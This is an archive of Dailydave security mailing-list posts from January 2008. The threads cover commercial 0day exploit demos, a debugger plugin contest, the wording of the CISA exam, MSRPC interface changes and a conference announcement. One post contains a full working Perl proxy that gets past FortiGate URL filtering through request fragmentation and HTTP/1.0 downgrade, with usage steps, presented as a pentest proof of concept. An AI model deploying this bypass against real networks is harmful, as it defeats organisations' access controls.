From admin at gleg.net Tue Jan 1 11:27:59 2008 From: admin at gleg.net (admin at gleg.net) Date: Tue, 01 Jan 2008 09:27:59 -0700 Subject: [Dailydave] 0day RealPlayer exploit demo Message-ID: <20080101092759.1chmvjzt1cogk8w8@gleg.net> Hi, We just released demo for our 0day RealPlayer 11 exploit - http://gleg.net/realplayer11.html, latest version we tested is RealPlayer 11 build 6.0.14.748 The exploit has been published Dec 16, 2007 as a part of VulnDisco SA updates. Happy New Year! Regards, Evgeny Legerov From admin at gleg.net Thu Jan 3 05:26:15 2008 From: admin at gleg.net (admin at gleg.net) Date: Thu, 03 Jan 2008 03:26:15 -0700 Subject: [Dailydave] 0day RealServer exploit demo Message-ID: <20080103032615.frmipht7r404w8g0@gleg.net> Hi, Here is another quick demo created with vnc2swf, our old 0day RealServer/Helix Server exploit - http://gleg.net/realserver.html The demonstrated CANVAS module exploits a heap overflow vulnerability in RealServer. The exploit was available to our clients since Oct 3, 2007. Feel free to email me if any questions appear. Happy New Year! Regards, Evgeny Legerov From nicolas at immunitysec.com Fri Jan 4 12:48:26 2008 From: nicolas at immunitysec.com (Nicolas Waisman) Date: Fri, 04 Jan 2008 15:48:26 -0200 Subject: [Dailydave] Immunity Debugger Contest Winner!! Message-ID: <477E716A.5040901@immunitysec.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 The Immunity Debugger Plugin contest has reached its end and we have a winner! Congratulations to Justin Seitz and his winning MikeBoo plugin, in his own words: "an attempt to automate the dissection of network protocols". It's up to Justin to decide between a candle lit dinner with Kostya Kortchinsky (our recommendation) or a brand new SILICA 'Prometheus Rising'. We will be integrating Justin's plugins into ID and hopefully they will be ready for the February release of Immunity Debugger. We would like to thank the judges and the ID Community for all their contributions and efforts. You can find ID support, new scripts, Python scripts and more at http://forum.immunityinc.com Regards, The Immunity Debugger Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHfnFqnx8KWzmcRsERAn3JAJ9ugsjG3+4+ZUXSVOtuEMyv2xlAzgCePcgR WU8xqFlvWxS+g1z6hE55vro= =67tD -----END PGP SIGNATURE----- From dan57170 at yahoo.com Thu Jan 3 18:35:13 2008 From: dan57170 at yahoo.com (H. Daniel Regalado Arias) Date: Thu, 3 Jan 2008 15:35:13 -0800 (PST) Subject: [Dailydave] FortiGuard: URL Filtering Application Bypass Vulnerability Message-ID: <295263.22220.qm@web30212.mail.mud.yahoo.com> I dont know if its new but i code it during a PentTest and i would like to share it with you. It is based on code developed By sinhack research labs: http://sinhack.net/URLFilteringEvasion/sakeru.tx Description: "Fortinet's URL blocking functionality can be bypassed by specially-crafted HTTP requests that fulfill 3 factors: 1.- HTTP Requests are terminated by the CRLF characters. 2.- Forcing to talk via HTTP/1.0 version so that dont send the host header. 3.- Finally, by Fragmenting the GET or POST requests Analysis: Fortinet's past vulnerability (http://www.fortiguardcenter.com/advisory/FGA-2006-10.html) said: Moreover, while it is possible "to bypass the functionality via an HTTP/1.0 request with no host header", the use of a host field is actually required to access a specific site on multi-homed web sites. When no host header is used, the intended web site is actually not displayed. Therefore, there is no risk. Macula's Analysis: If you dont have properly installed some AV, HIPS, etc, through this vuln, a workstation can connect to a malicious "Hacking Site" and get infected. Also through this vuln, you can connect to different porn sites without problems. And no matter if its or not multi-homed web sites. So we consider its not a low risk. Products affected: We only tested it on: fortiGate-1000 3.00, build 040075,070111 Solution: We tried to contact the vendor, but without any response. PoC: #!/usr/bin/perl ######################################## # fortiGuard.pl v0.1 - http://www.macula-group.com/ # # # URL Filtering Bypass proof of concept # Author: Daniel Regalado aka Danux... Hacker WannaBe!!! (only some minnor modifications from sinhack code) # Based on PoC from sinhack research labs -> sakeru.pl # #FortiGuard's URL blocking functionality can be bypassed by specially-crafted HTTP requests that are terminated by the CRLF character #instead of the LF characters and changing version of HTTP to 1.0 without sending Host: Header and Fragmenting the GET and POST Requests # #Tested On: fortiGate-1000 3.00, build 040075,070111 # #This code has been released Only for educational purposes. The author cannot be held responsible for any bad use. # Usage: # 1) perl fortiGuard.pl # 2) Configure your browser's proxy at localhost:5050 # 3) Have fun. # --- Start Of Script--- use strict; use URI; use IO::Socket; my $showOpenedSockets=1; #Activate the console logging my $debugging=0; my $server = IO::Socket::INET->new ( #Proxy Configuration LocalPort => 5050, #Change the listening port here Type => SOCK_STREAM, Reuse => 1, Listen => 10); binmode $server; print "Waiting for connections on port 5050 TCP...\n"; while (my $browser = $server->accept()) { #When a connection occure... binmode $browser; my $method=""; my $content_length = 0; my $content = 0; my $accu_content_length = 0; my $host; my $hostAddr; my $httpVer; my $line; while (my $browser_line = <$browser>) { #Get the Browser commands unless ($method) { ($method, $hostAddr, $httpVer) = $browser_line =~ /^(\w+) +(\S+) +(\S+)/; my $uri = URI->new($hostAddr); $host = IO::Socket::INET->new ( #Opening the connexion to the remote host PeerAddr=> $uri->host, PeerPort=> $uri->port ) or die "couldn't open $hostAddr"; if ($showOpenedSockets) { #Connection logs #print "Source:".$browser->peerhost."\n"; my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time); $year += 1900; $mon += 1; printf ("\n%04d-%02d-%02d %02d:%02d:%02d ",$year,$mon,$mday,$hour,$min,$sec); print $browser->peerhost." -> ".$uri->host.":".$uri->port." $method ".$uri->path_query."\n";; } binmode $host; my $char; if ($method == "GET") { #Fragmention the "GET" query foreach $char ('G','E','T',' ') { #I know, there is better way to do it, print $host $char; #but I'm tired and lazy... } } elsif ($method == "POST") { #Fragmentation of "POST" query foreach $char ('P','O','S','T',' ') { print $host $char; } } else { print $host "$method "; #For all the other methods, send them without modif print "*"; } $httpVer="HTTP/1.0"; #Forzando a version 1.0 print $host $uri->path_query . " $httpVer\r\n"; #Send the rest of the query (url and http version) #next; } $content_length = $1 if $browser_line=~/Content-length: +(\d+)/i; $accu_content_length+=length $browser_line; foreach $line (split('\n', $browser_line)) { #Fragment the Host query if ($line =~ /^Host:/ ) { #my $char=""; #my $word=""; #my $bogus=""; #($bogus,$word) = split(' ', $line); #foreach $char ('H','o','s','t',':',' ') { #print $host $char; #} #print $host $word."\r\n"; } else { print $host "$line\r\n"; #For all the other lines, send them without modif } if ( $debugging == 1 && $method == "POST" ) { print "$line\n"; } } #Danux Clave para terminar el Request y enviarlo al servidor web, de otra forma se queda esperando este ultimo la peticion print $host "\r\n"; last if $browser_line =~ /^\s*$/ and $method ne 'POST'; if ($browser_line =~ /^\s*$/ and $method eq "POST") { $content = 1; last unless $content_length; next; } #print length $browser_line . " - "; if ($content) { $accu_content_length+=length $browser_line; last if $accu_content_length >= $content_length; } } $content_length = 0; $content = 0; $accu_content_length = 0; my $crcount=0; my $totalcounter=0; my $packetcount=0; while ( my $host_line = <$host> ) { #Reception of the result from the server $totalcounter+=length $host_line; print $browser $host_line; #Send them back to the browser #print $host_line if ( ! $content ); #Send them back to the browser if ($host_line=~/Content-length: +(\d+)/i) { $content_length = $1; #print " * Expecting $content_length\n"; #if ($debugging); } if ($host_line =~ m/^\s*$/ and not $content) { $content = 1; #print " * Beginning of the data section\n"; } if ($content) { #$accu_content_length+=length $host_line; if ($content_length) { #print " * binary data section\n"; my $buffer; my $buffersize = 512; if ($content_length < $buffersize) { $buffersize = $content_length; } while ( my $nbread = read($host, $buffer, $buffersize)) { print "#"; $packetcount++; $accu_content_length+=$nbread; #last if $accu_content_length >= $content_length; print $browser $buffer; #Send them back to the browser #print $buffer; #print "\n(#$packetcount) "; #print "total: $totalcounter content_length: $content_length acc: $accu_content_length\t"; my $tmp1 = $content_length - $accu_content_length; #print "length-accu= $tmp1\n"; if ($tmp1 < $buffersize) { $buffersize = $tmp1; #print "new buffersize = $buffersize\n"; } } #print "Out of the content while\n"; } } #print "(#$packetcount) "; #print "total: $totalcounter content_length: $content_length acc: $accu_content_length\t"; #my $tmp1 = $content_length - $accu_content_length; #print "length-accu= $tmp1\n"; last if ($accu_content_length >= $content_length and $content == 1 and $content_length); } #print "\nOut for a while\n"; if ($browser) { $browser -> close; } #Closing connection to the browser if ($host) { $host -> close; } #Closion connection to the server } # --- EOF --- Danux, CISSP, OSCP Offensive Security Consultant Macula Security Consulting Group www.macula-group.com ----- Mensaje original ---- De: "admin at gleg.net" Para: dailydave at lists.immunitysec.com CC: info at gleg.net Enviado: jueves, 3 de enero, 2008 4:26:15 Asunto: [Dailydave] 0day RealServer exploit demo Hi, Here is another quick demo created with vnc2swf, our old 0day RealServer/Helix Server exploit - http://gleg.net/realserver.html The demonstrated CANVAS module exploits a heap overflow vulnerability in RealServer. The exploit was available to our clients since Oct 3, 2007. Feel free to email me if any questions appear. Happy New Year! Regards, Evgeny Legerov _______________________________________________ Dailydave mailing list Dailydave at lists.immunitysec.com http://lists.immunitysec.com/mailman/listinfo/dailydave ____________________________________________________________________________________ ?Capacidad ilimitada de almacenamiento en tu correo! No te preocupes m?s por el espacio de tu cuenta con Correo Yahoo!: http://correo.espanol.yahoo.com/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20080103/797d6c32/attachment-0001.htm From jms at bughunter.ca Fri Jan 4 14:38:36 2008 From: jms at bughunter.ca (J.M. Seitz) Date: Fri, 04 Jan 2008 11:38:36 -0800 Subject: [Dailydave] Immunity Debugger Contest Winner!! In-Reply-To: <477E716A.5040901@immunitysec.com> References: <477E716A.5040901@immunitysec.com> Message-ID: <477E8B3C.2080502@bughunter.ca> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 > It's up to Justin to decide between a candle lit dinner with Kostya > Kortchinsky (our recommendation) or a brand new SILICA 'Prometheus > Rising'. I most definitely choose the candlelit dinner with Kostya. Maybe we could start out with a nice burger and beer and finish it up with a long walk on the beach. For extra points I like red long-stemmed roses and SILICA's :) Ballroom dancing is optional.... JS -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHfos8KEj7ZJktQNsRAiX2AJ9rQbbYhFv6sfP3R2bPwEV6FxTU8gCeLoC2 natKdikYOrzZsxg6uxX8hEQ= =HKSt -----END PGP SIGNATURE----- From isaac.dawson at gmail.com Mon Jan 7 00:18:28 2008 From: isaac.dawson at gmail.com (Isaac Dawson) Date: Mon, 7 Jan 2008 14:18:28 +0900 Subject: [Dailydave] CISA Message-ID: <5ff6321e0801062118m3c800967y4bdab126918790d8@mail.gmail.com> Just wondering if anyone here took the CISA exam... I was reading one of my coworkers reports and noticed he used "segregation of duties" instead of separation of duties. When I questioned him he said thats what CISA uses. I find this a little odd because, if my reading of the dictionary is correct, segregation has to do with dividing people based on race and ethnicity. -isaac -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20080107/721b5abd/attachment-0001.htm From richard.j.smith at hp.com Thu Jan 10 12:51:31 2008 From: richard.j.smith at hp.com (Rich Smith) Date: Thu, 10 Jan 2008 17:51:31 +0000 Subject: [Dailydave] p2psvc.dll idl function definition ambiguities - any ideas? Message-ID: <7A2C10B6-AF05-4618-9940-804695D7B39E@hp.com> Hi all, I've been playing about with some MSRPC stuff in an effort to improve some fingerprinting techniques and have come up with some ambiguities in p2psvc.dll that I can't explain - so I was wondering if anyone on list might be able to :) On unmidl'ing p2psvc.dll from a base install of XP with SP2 (no patches) and one from an XP SP2 that is patched up to date shows differences in the type & function definitions of the interfaces a2d47257-12f7-4beb-8981-0ebfa935c407 (pnrpsvc) & 8174bb16-571b-4c38-8386-1102b449044a (IP2pIMSvc) but their interface version numbers haven't been changed? Specifically functions 0x05 (register) an 0x07 (resolve) for pnrpsvc have some different and extra arguments, in addition to differences in type definitions (partial idl's included at end). I thought (though I'm happy to be corrected) that the whole point of the UUID and version number was so that you always knew your were communicating with an interface that understood things were the way you understood them to be - so how can the same interface have the same UUID & version and different function definitions, surely this causes incompatibility? The question this also raises is to why the changes were made, anyone any insight? I'm currently in the process of tracking down which patch introduced the changes, so I'll update when I find out. Cheers Rich [partial idl's - {*DD*} denotes difference] ... ... //NDR Version = 0002 //IDL [ uuid(a2d47257-12f7-4beb-8981-0ebfa935c407), version(1.0) ] interface myinterface ... ... long Function_05( [out] [context_handle] void * element_38823, {*DD*}[in] [context_handle] void * element_38824, [in] [string] wchar_t * element_38825, [in] [unique] [string] wchar_t * element_38826, [in] TYPE_3 * element_38827, [in] [unique] TYPE_6 ** element_38841, [out] TYPE_6 * element_38843, [in] long element_38844, [in,out] [unique] long * element_38845 ); ... ... long Function_07( [out] [context_handle] void * element_38849, {*DD*}[in] [context_handle] void * element_38850, {*DD*}[in] [string] wchar_t * element_38851, [in] [string] wchar_t * element_38852, [in] long element_38853, [in] long element_38854, [in] /* enum */ unsigned short element_38855, [in] [unique] TYPE_6 ** element_38856, [in] long element_38857, [in] long element_38858, [in] long element_38859, [in,out] [unique] long * element_38860 ); ... ... ... ... //NDR Version = 0002 //IDL [ uuid(a2d47257-12f7-4beb-8981-0ebfa935c407), version(1.0) ] interface myinterface ... ... long Function_05( [out] [context_handle] void * element_23239, {*DD*}[in] long element_23240, [in] [string] wchar_t * element_23241, [in] [unique] [string] wchar_t * element_23242, [in] TYPE_3 * element_23243, [in] [unique] TYPE_7 ** element_23263, [out] TYPE_7 * element_23265, [in] long element_23266, [in,out] [unique] long * element_23267 ); ... ... long Function_07( [out] [context_handle] void * element_23271, {*DD*}[in] long element_23272, {*DD*}[in] [unique] [string] wchar_t * element_23273, [in] [string] wchar_t * element_23274, [in] long element_23275, [in] long element_23276, [in] /* enum */ unsigned short element_23277, [in] [unique] TYPE_7 ** element_23278, [in] long element_23279, [in] long element_23280, [in] long element_23281, {*DD*}[in] long element_23282, {*DD*}[in] long element_23283, [in,out] [unique] long * element_23284 ); ... ... -- Rich Smith Trusted Systems Lab Hewlett-Packard Labs -- Hewlett-Packard Limited registered Office: Cain Road, Bracknell, Berks RG12 1HN Registered No: 690597 England The contents of this message and any attachments to it are confidential and may be legally privileged. If you have received this message in error, you should delete it from your system immediately and advise the sender. To any recipient of this message within HP, unless otherwise stated you should consider this message and attachments as "HP CONFIDENTIAL". -- From dave.korn at artimi.com Fri Jan 4 14:59:31 2008 From: dave.korn at artimi.com (Dave Korn) Date: Fri, 4 Jan 2008 19:59:31 -0000 Subject: [Dailydave] 0day RealServer exploit demo In-Reply-To: <20080104011503.suh5lv1v4ock4oo4@gleg.net> References: <20080103032615.frmipht7r404w8g0@gleg.net><012401c84e61$22d110a0$2e08a8c0@CAM.ARTIMI.COM> <20080104011503.suh5lv1v4ock4oo4@gleg.net> Message-ID: <008e01c84f0c$52137d70$2e08a8c0@CAM.ARTIMI.COM> On 04 January 2008 08:15, admin at gleg.net wrote: > Hi, > >> On 03 January 2008 10:26, admin at gleg.net wrote: >> >>> The demonstrated CANVAS module exploits a heap overflow vulnerability >>> in RealServer. The exploit was available to our clients since Oct 3, 2007. >>> >>> Feel free to email me if any questions appear. >> >> Ok, since you did say "any questions", I do have a question: >> >> Q: What's the bug and how do I trigger it (apart from by buying >> VulnDisco)? >> > Honestly, what answer you expect to get from me? ;-) A silly or humorous one! :-) Plus, maybe, the start of a thread about those SWF demos that people are always showing these days. Because after all, they're not very exciting to watch, and they're all pretty much the same; you see a cursor, it makes a few selections from a few dialog boxes, it clicks "Start", a window opens saying that it's a shell and that it's running on a different machine... apart from the text in the drop-down box in the dialog when the particular exploit is selected, they're all basically identical. And of course they are all showing you the dull end of the exploit, when all the 'action' is taking place at the remote end. I thought it might be interesting to raise the topic of whether they could be made more demonstrative and informative yet without giving too much away that people don't want to disclose. For example, it might be possible to add a little picture-in-picture inset, showing a sort of broad overview of the target process' memory space, maybe using different colours to show the evil data arriving in the target's memory, being processed, and ending up being executed. Something like that might give people a general idea of whether it was a heap or a buffer overflow, and how clever/tricky it was, without giving away enough information to even start trying to reverse it; but imagine watching a unicode venetian blind exploit constructing itself in front of your eyes, or seeing strings being concatenated until they spill out of a buffer. There must be ideas like this that could add value to what are otherwise fairly dull demos, don't you think? cheers, DaveK -- Can't think of a witty .sigline today.... From smhollingsworth at gmail.com Mon Jan 14 12:12:35 2008 From: smhollingsworth at gmail.com (Sean Hollingsworth) Date: Mon, 14 Jan 2008 12:12:35 -0500 Subject: [Dailydave] CISA In-Reply-To: <5ff6321e0801062118m3c800967y4bdab126918790d8@mail.gmail.com> References: <5ff6321e0801062118m3c800967y4bdab126918790d8@mail.gmail.com> Message-ID: <66dccc4d0801140912q22976a66tab3517f25e491ef7@mail.gmail.com> http://www.isaca.org/Content/ContentGroups/Certification3/CRM_Segregation_of_Duties.pdf On Jan 7, 2008 12:18 AM, Isaac Dawson wrote: > Just wondering if anyone here took the CISA exam... I was reading one of my > coworkers reports and noticed he used "segregation of duties" instead of > separation of duties. When I questioned him he said thats what CISA uses. I > find this a little odd because, if my reading of the dictionary is correct, > segregation has to do with dividing people based on race and ethnicity. > -isaac > > > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > > From adriel at netragard.com Mon Jan 14 12:19:10 2008 From: adriel at netragard.com (Adriel Desautels) Date: Mon, 14 Jan 2008 12:19:10 -0500 Subject: [Dailydave] Open Source Methodologies for Application Testing Message-ID: <478B998E.9030207@netragard.com> Greetings, I am aware that methodologies like the OSSTMM and OWASP exist, but are there any similar methodologies for performing assessments against applications like Microsoft Office, etc? I haven't done much searching so if the answer is obvious then I apologize in advance. -- Regards, Adriel T. Desautels Chief Technology Officer Netragard, LLC. Office : 617-934-0269 Mobile : 617-633-3821 http://www.linkedin.com/pub/1/118/a45 Join the Netragard, LLC. Linked In Group: http://www.linkedin.com/e/gis/48683/0B98E1705142 --------------------------------------------------------------- Netragard, LLC - http://www.netragard.com - "We make IT Safe" Penetration Testing, Vulnerability Assessments, Website Security -------------- next part -------------- A non-text attachment was scrubbed... Name: adriel.vcf Type: text/x-vcard Size: 298 bytes Desc: not available Url : http://lists.immunitysec.com/pipermail/dailydave/attachments/20080114/70af99a9/attachment.vcf -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 186 bytes Desc: OpenPGP digital signature Url : http://lists.immunitysec.com/pipermail/dailydave/attachments/20080114/70af99a9/attachment.pgp From crioux at noctem.org Mon Jan 14 14:24:50 2008 From: crioux at noctem.org (Christien Rioux) Date: Mon, 14 Jan 2008 14:24:50 -0500 Subject: [Dailydave] Announcement: SOURCE Boston 2008 Message-ID: <5680af290801141124m5eda7ac9yc18d3d22126cb6f2@mail.gmail.com> Hello folks, Just announcing the creation of a new security conference in the Boston Area! You might recognize some of the people organizing it :) Looking forward to it, hope to see you there! --Chris Rioux --- http://www.sourceboston.com/ SOURCE is a one-of-a-kind event for the Boston area: A computer security conference that combines business, technology, and software development, and provides an opportunity to share ideas, insights and opportunities. SOURCE is focused on three tracks designed to maximize the value of the experience for all who participate, regardless of technical level. There is something here for everyone who deals with security issues on a day-to-day basis. Please join us in March 2008 to participate in a growing community of like-minded security professionals. Why Attend SOURCE? * Listen to industry-leading keynote speakers Dan Geer, and Steven Levy. * Network with and learn from world-class security professionals * Participate in the growing local computer security industry * Experience a fun and edgy approach to industry and professional sessions * Witness the first L0pht Heavy Industries panel discussion in ten years * St. Patrick's Day celebrations will be taking place the weekend following SOURCE. The $129 room rate has been extended to allow attendees to enjoy a weekend that is rich in Boston's history. Who Will Be There? (400-450 attendees) The East Coast is home to some of the world's leading computer security professionals. The computer security industry has been active for many years, and is now experiencing rapid growth. SOURCE is a combination of security industry professionals, MIT and Harvard faculty and students, senior and top-level executives, members of the management and business community, engineering professionals and software developers. Participate in this local forum and tap into a unique and invaluable resource. From nruff at security-labs.org Mon Jan 14 14:38:09 2008 From: nruff at security-labs.org (Nicolas RUFF) Date: Mon, 14 Jan 2008 20:38:09 +0100 Subject: [Dailydave] p2psvc.dll idl function definition ambiguities - any ideas? In-Reply-To: <7A2C10B6-AF05-4618-9940-804695D7B39E@hp.com> References: <7A2C10B6-AF05-4618-9940-804695D7B39E@hp.com> Message-ID: <478BBA21.60203@security-labs.org> > I've been playing about with some MSRPC stuff in an effort to improve > some fingerprinting techniques and have come up with some ambiguities > in p2psvc.dll that I can't explain - so I was wondering if anyone on > list might be able to :) PNRP has been updated to version 2.0 through a Windows Update "recommended" patch. http://www.microsoft.com/downloads/details.aspx?FamilyId=55219164-EC71-4A32-A648-4ED2582EBC7C&displaylang=en Are you sure you are diffing the same version? My .02, - Nicolas RUFF From lists at isecom.org Mon Jan 14 17:00:24 2008 From: lists at isecom.org (Pete Herzog) Date: Mon, 14 Jan 2008 23:00:24 +0100 Subject: [Dailydave] Open Source Methodologies for Application Testing In-Reply-To: <478B998E.9030207@netragard.com> References: <478B998E.9030207@netragard.com> Message-ID: <478BDB78.2080104@isecom.org> Hi, Take a look at SCARE (www.isecom.org/scare) which is for measuring the security complexity of source code but the concept still applies. We use that as a framework also for application tests as well. It's from the OSSTMM 3.0 so the concepts are very new but it really helps you test for the size of an application's attack surface and the controls in place. You may want to take a look at it. Sincerely, -pete. Adriel Desautels wrote: > Greetings, > I am aware that methodologies like the OSSTMM and OWASP exist, but > are there any similar methodologies for performing assessments against > applications like Microsoft Office, etc? I haven't done much searching > so if the answer is obvious then I apologize in advance. > > > ------------------------------------------------------------------------ > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave From RICKY.D.SMITH at saic.com Mon Jan 14 19:53:08 2008 From: RICKY.D.SMITH at saic.com (R D Smith) Date: Mon, 14 Jan 2008 19:53:08 -0500 Subject: [Dailydave] CISA In-Reply-To: Message-ID: > When I questioned him he said thats what CISA uses. I > find this a little odd because, if my reading of the dictionary is correct, > segregation has to do with dividing people based on race and ethnicity. > -isaac Yes, that is the generally accepted definition of the word segregation. However, ISACA's usage is consistent with the second part of the second definition of segregation in Merriam-Webster's Online Dictionary , ?the separation for special treatment or observation of individuals or items from a larger group.? This is a more general definition of the word without the negative connotations. R -- Rick Smith GIAC GSE, CISSP-ISSEP, CISA Senior Systems Security Engineer From rodney at tsc-labs.net Mon Jan 14 21:58:17 2008 From: rodney at tsc-labs.net (Rodney Thayer) Date: Mon, 14 Jan 2008 18:58:17 -0800 Subject: [Dailydave] CISA In-Reply-To: References: Message-ID: <478C2149.3030705@tsc-labs.net> R D Smith wrote: >> When I questioned him he said thats what CISA uses. I >> find this a little odd because, if my reading of the dictionary is correct, >> segregation has to do with dividing people based on race and ethnicity. >> -isaac > > Yes, that is the generally accepted definition of the word segregation. > However, ISACA's usage is consistent with the second part of the second > definition of segregation in Merriam-Webster's Online Dictionary > , ?the separation for special > treatment or observation of individuals or items from a larger group.? This > is a more general definition of the word without the negative connotations. ...which isn't in line with generally accepted computer security terminology. But then again who said this had anything to do with generally accepted computer security practices ;-) One would like to think a test like that would be based on something better, like some military term, or some information assurance term, or something. a decent lie would be sufficient ;-) Oh well. The less computer-literate your certificate computer security staff sounds, the more likely you'll be able to take out their network... (so it relates. it's intelligence you'd collect on a recon run against that target.) From richard.j.smith at hp.com Tue Jan 15 06:44:34 2008 From: richard.j.smith at hp.com (Rich Smith) Date: Tue, 15 Jan 2008 11:44:34 +0000 Subject: [Dailydave] p2psvc.dll idl function definition ambiguities - any ideas? In-Reply-To: <478BBA21.60203@security-labs.org> References: <7A2C10B6-AF05-4618-9940-804695D7B39E@hp.com> <478BBA21.60203@security-labs.org> Message-ID: <9FD212F2-D1FC-41A9-BCBF-6834C497923A@hp.com> Cheers for the pointer to MS download note, while PNRP may have been updated to V2.0 this doesn't reference which MSRPC interfaces have changed. An application version change doesn't mean the constituent MSRPC interfaces are changed per se, and from the unmidl'd p2psvc.dll the version numbers on interfaces a2d47257-12f7-4beb-8981-0ebfa935c407 (pnrpsvc) & 8174bb16-571b-4c38-8386-1102b449044a (IP2pIMSvc) are the same in both versions. Which brings me back to the original question: If v.2.0 of PNRP has changed the MSRPC interface definitions, why haven't the version numbers on the interfaces been bumped or new UUID's been designated? idl's of the two versions of the p2psvc.dll are attached if people want to have a peek. Cheers Rich -------------- next part -------------- A non-text attachment was scrubbed... Name: p2psvc_xpsp2base_UNMIDL.idl Type: application/octet-stream Size: 16167 bytes Desc: not available Url : http://lists.immunitysec.com/pipermail/dailydave/attachments/20080115/c829100a/attachment-0002.obj -------------- next part -------------- A non-text attachment was scrubbed... Name: p2psvc_xpsp2up2date_UNMIDL.idl Type: application/octet-stream Size: 16590 bytes Desc: not available Url : http://lists.immunitysec.com/pipermail/dailydave/attachments/20080115/c829100a/attachment-0003.obj -------------- next part -------------- On 14 Jan 2008, at 19:38, Nicolas RUFF wrote: >> I've been playing about with some MSRPC stuff in an effort to >> improve >> some fingerprinting techniques and have come up with some ambiguities >> in p2psvc.dll that I can't explain - so I was wondering if anyone on >> list might be able to :) > > PNRP has been updated to version 2.0 through a Windows Update > "recommended" patch. > > http://www.microsoft.com/downloads/details.aspx?FamilyId=55219164-EC71-4A32-A648-4ED2582EBC7C&displaylang=en > > Are you sure you are diffing the same version? > > My .02, > - Nicolas RUFF -- Rich Smith Trusted Systems Lab Hewlett-Packard Labs -- Hewlett-Packard Limited registered Office: Cain Road, Bracknell, Berks RG12 1HN Registered No: 690597 England The contents of this message and any attachments to it are confidential and may be legally privileged. If you have received this message in error, you should delete it from your system immediately and advise the sender. To any recipient of this message within HP, unless otherwise stated you should consider this message and attachments as "HP CONFIDENTIAL". -- -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/pkcs7-signature Size: 4213 bytes Desc: not available Url : http://lists.immunitysec.com/pipermail/dailydave/attachments/20080115/c829100a/attachment-0001.bin From admin at gleg.net Tue Jan 15 09:56:55 2008 From: admin at gleg.net (admin at gleg.net) Date: Tue, 15 Jan 2008 07:56:55 -0700 Subject: [Dailydave] 0day RealServer exploit demo In-Reply-To: <008e01c84f0c$52137d70$2e08a8c0@CAM.ARTIMI.COM> References: <20080103032615.frmipht7r404w8g0@gleg.net><012401c84e61$22d110a0$2e08a8c0@CAM.ARTIMI.COM> <20080104011503.suh5lv1v4ock4oo4@gleg.net> <008e01c84f0c$52137d70$2e08a8c0@CAM.ARTIMI.COM> Message-ID: <20080115075655.rswbt3g1fk444w4g@gleg.net> Hi, > On 04 January 2008 08:15, admin at gleg.net wrote: > >> Hi, >> >>> On 03 January 2008 10:26, admin at gleg.net wrote: >>> >>>> The demonstrated CANVAS module exploits a heap overflow vulnerability >>>> in RealServer. The exploit was available to our clients since Oct 3, 2007. >>>> >>>> Feel free to email me if any questions appear. >>> >>> Ok, since you did say "any questions", I do have a question: >>> >>> Q: What's the bug and how do I trigger it (apart from by buying >>> VulnDisco)? >>> >> Honestly, what answer you expect to get from me? ;-) > > > A silly or humorous one! :-) > > Plus, maybe, the start of a thread about those SWF demos that people are > always showing these days. > > Because after all, they're not very exciting to watch, and they're all > pretty much the same; you see a cursor, it makes a few selections from a few > dialog boxes, it clicks "Start", a window opens saying that it's a shell and > that it's running on a different machine... apart from the text in the > drop-down box in the dialog when the particular exploit is selected, they're > all basically identical. And of course they are all showing you the dull end > of the exploit, when all the 'action' is taking place at the remote end. I > thought it might be interesting to raise the topic of whether they could be > made more demonstrative and informative yet without giving too much away that > people don't want to disclose. > > For example, it might be possible to add a little picture-in-picture inset, > showing a sort of broad overview of the target process' memory space, maybe > using different colours to show the evil data arriving in the > target's memory, > being processed, and ending up being executed. Something like that > might give > people a general idea of whether it was a heap or a buffer overflow, and how > clever/tricky it was, without giving away enough information to even start > trying to reverse it; but imagine watching a unicode venetian blind exploit > constructing itself in front of your eyes, or seeing strings being > concatenated until they spill out of a buffer. There must be ideas like this > that could add value to what are otherwise fairly dull demos, don't > you think? > Nice thread, any ideas how I could make our demos more interesting will be greatly appreciated ;-) Lately I updated realplayer flash demo, we are using CANVAS to take a screenshot. -- Best regards, Evgeny Legerov From dave at immunityinc.com Thu Jan 17 11:33:26 2008 From: dave at immunityinc.com (Dave Aitel) Date: Thu, 17 Jan 2008 11:33:26 -0500 Subject: [Dailydave] Huahine Boys Message-ID: <478F8356.5020908@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I'm back from pow-wowing with the Huahine Boys and among other things, preparing to give the second day keynote ("The Hacker Strategy") at the S4 conference here in Miami on SCADA security [1]. Steve Lipner is giving the first day's keynote, so you'll get both sides of the story if you sign up for the "Virtual Attendee" ticket (or if you show up in person - I think there are a couple seats left if you hurry). I see that Alex Wheeler and Ryan Smith have delivered a late Christmas present with the first remote vulnerability on XP SP2 and Vista. ISS's Holly Stewart has an interesting blog on it today as well talking about some of the potential problems with IPS and this kind of bug[2]. Microsoft makes triggering the issue sound a bit harder than it actually is in their weblog posting [3]. You'll be able to trigger it every time, especially on a local LAN. This vulnerability may or may not have anything to do with the Vista bug in the screenshot at the end of Justine's 0days presentation [4]. :> I do think this vulnerability is going to be one of the biggest of 2008 - but this is possibly due to the vulnerability marketplace sucking the air out of the publicly released vulnerabilities. Very rarely does anyone go deep sea fishing and talk about it any more. - -dave [1] http://www.digitalbond.com/wp-content/uploads/2007/10/S4_2008_Agenda.pdf [2] http://blogs.iss.net/archive/howtoprotectMS08-001.html [3] http://blogs.technet.com/swi/archive/2008/01/08/ms08-001-part-3-the-case-of-the-igmp-network-critical.aspx """ The attacker can run their attack non-stop, and eventually they will be lucky enough to have the timer fire with the appropriate conditions to trigger the vulnerability. However, they don?t know for sure how many packets to send, or what will be in the buffer when they trigger the vulnerability. """ (The PoC in the CANVAS Early Updates program will challenge that assumption a bit.) [4] 